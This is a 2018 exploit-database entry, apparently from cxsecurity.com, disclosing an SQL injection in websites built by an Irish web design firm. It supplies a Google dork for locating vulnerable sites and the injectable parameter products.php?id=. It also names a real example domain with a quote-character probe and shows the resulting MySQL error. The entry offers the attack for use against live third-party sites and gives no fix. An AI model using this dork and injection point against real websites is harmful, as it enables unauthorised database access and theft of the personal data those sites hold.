Website Designed By 21st Century Ireland SQL Injection Vulnerability

2018.09.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Website Designed By 21st Century Ireland SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 12/09/2018 # Vendor Homepage : 21stcentury.ie # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Description : SportLoMo, Next Generation Sports Software (formerly 21s Century Computers) League and Membership software for Sports Associations, Leagues and Clubs. This Software takes the hassle out of running amateur sport. The company operates as Sports Manager in Ireland. SportLoMo, is used by sports administrators to manage league competitions & player data for one million people. Head office in Mayo, Ireland. # Google Dork : intext:''website designed by 21st Century'' site:ie intext:''website designed by: 21st Century Web Design'' site:ie # Exploit : /products.php?id=[SQL Injection] ################################################################################################# # Example Site => mchalefm.ie/products.php?id=2%27 => [ Proof of Concept ] => archive.is/9nmGB # SQL Database Error => Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in E:\Domains\m\mchalefm.ie-1082275747\user\htdocs\class\db.sqlfunctions.class.php on line 57 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-21st-century-ireland-sql-injection-vuln.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top